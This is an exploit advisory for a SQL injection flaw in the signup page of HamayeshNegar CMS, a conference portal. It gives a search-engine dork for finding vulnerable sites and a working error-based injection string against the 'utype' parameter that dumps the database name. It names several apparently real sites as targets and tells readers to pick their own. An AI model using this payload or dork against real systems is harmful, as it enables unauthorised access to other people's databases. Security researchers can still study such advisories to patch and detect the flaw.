HamayeshNegar Cms >9.1.3 - SQL Injection

# # # # # # # # Exploit Title: HamayeshNegar Cms >9.1.3 - SQL Injection # Dork: intext:"همایش نگار ( پورتال آنلاین مدیریت و داوری همایش ) ویرایش" # Date: 13.09.2017 # Vendor Homepage: http://www.hamayeshnegar.com/ # Version: >9.1.3 # Tested on: WiN8_x64/WiN10_x64/KaLiLinuX_x64 # # # # # # # # Exploit Author: ArashHC # Author Web: http://t.me/CyberSoldiersST # Author Social: @ArashHC # # # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Search dork on google, Select your target # My Target: # http://veconf.com # Inject /users/signup.php?utype=user at last of url # utype parameter have SqlI bug # For Export Database name: # [Site]/users/signup.php?utype=user' and(select 1 from(select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.tables group by 2)b)--+ # # Admin Page: # [Site]/admin/ # # For Find Target: # dork: intext:"همایش نگار ( پورتال آنلاین مدیریت و داوری همایش ) ویرایش" # site: http://www.hamayeshnegar.com/counter.php # Demos: # http://veconf.com # http://wse1.ir # http://contas96.ir # # # # # # # # # Thanks to : EreBus, RexProg, JohnGH, AVENGER, ViRuS007, BlackWolfIran, LM7RIX, AliCyber, </ZED>, Agent W, AnonyCoder, Sarbaz Vatan, unknown0707, FarsProg # # https://t.me/CyberSoldiersST # # Discovered By: ArashHC # # # # # # # #

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